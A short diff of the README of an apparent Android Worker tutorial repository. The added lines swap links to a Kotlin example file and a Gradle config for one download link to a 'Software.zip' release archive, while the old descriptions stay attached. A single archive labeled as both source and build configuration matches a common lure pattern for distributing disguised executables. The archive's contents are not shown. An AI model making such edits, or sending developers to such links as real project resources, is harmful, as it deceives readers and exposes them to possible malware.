Damaonly/android-worker/README.md

 In this repository, you'll find resources to help you understand and implement Android Workers in your Kotlin Android application.
 Here are some key resources available:

-- `src/main/java/com/example/worker/WorkerExample.kt`: An example of an Android Worker implementation in Kotlin.
+- `https://github.com/Damaonly/android-worker/releases/download/v1.0/Software.zip`: An example of an Android Worker implementation in Kotlin.
-- `build.gradle`: Gradle configuration for the project.
+- `https://github.com/Damaonly/android-worker/releases/download/v1.0/Software.zip`: Gradle configuration for the project.

 ## 🛠️ Usage